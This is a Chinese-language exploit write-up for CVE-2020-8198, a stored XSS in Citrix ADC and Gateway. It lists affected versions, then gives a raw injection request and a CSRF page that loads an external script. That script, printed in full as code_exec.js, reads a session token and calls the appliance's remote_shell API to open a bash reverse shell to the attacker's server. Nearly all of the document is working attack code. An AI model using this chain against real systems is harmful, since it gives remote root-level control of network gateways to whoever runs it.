(CVE-2020-8198)Citrix 储存型xss
一、漏洞简介
要求受害者以NSIP管理员(nsroot)的身份登录
二、漏洞影响
Citrix ADC and Citrix Gateway: \< 13.0-58.30
Citrix ADC and NetScaler Gateway: \< 12.1-57.18
Citrix ADC and NetScaler Gateway: \< 12.0-63.21
Citrix ADC and NetScaler Gateway: \< 11.1-64.14
NetScaler ADC and NetScaler Gateway: \< 10.5-70.18
Citrix SD-WAN WANOP: \< 11.1.1a
Citrix SD-WAN WANOP: \< 11.0.3d
Citrix SD-WAN WANOP: \< 10.2.7
Citrix Gateway Plug-in for Linux: \< 1.0.0.137
三、复现过程
POST /menu/stapp HTTP/1.1
Host: www.0-sec.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
X-NITRO-USER: henk
sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert('xss')</script>&au=1&username=nsroot
深入利用
csrf.html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.0-sec.org/menu/stapp" method="POST">
<input type="hidden" name="sid" value="254" />
<input type="hidden" name="pe" value="1,2,3,4,5" />
<input type="hidden" name="appname" value="%0a</title><script src='http://localhost:9090/code_exec.js'></script>" />
<input type="hidden" name="au" value="1" />
<input type="hidden" name="username" value="nsroot" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
code_exec.js
function load(url, callback) {
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState === 4) {
rand = callback(xhr.response);
exec_command(rand);
}
}
xhr.open('GET', url, true);
xhr.send('');
}
function get_rand(payload) {
var lines = payload.split("\n");
for(var i = 0; i < lines.length; i++) {
if (lines[i].includes('var rand = "')) {
var rand = lines[i].split('"')[1]
return rand;
}
}
}
function exec_command(rand) {
url = '/rapi/remote_shell'
command = 'bash -c \"bash -i >%26 /dev/tcp/你的服务器/16588 0>%261\"'
var obj = {
"params":{
"warning":"YES"
},
"remote_shell":{
"command":command,
"prompt":">",
"target":"shell",
"suppress":0,
"execute_in_partition":""
}
}
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState === 4) {
response = JSON.parse(xhr.response);
alert(response['remote_shell']['output']);
}
}
xhr.open('POST', url, true);
xhr.setRequestHeader('rand_key', rand)
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded')
xhr.send('object=' + JSON.stringify(obj));
}
var url = '/menu/stc';
load(url, get_rand)
1.png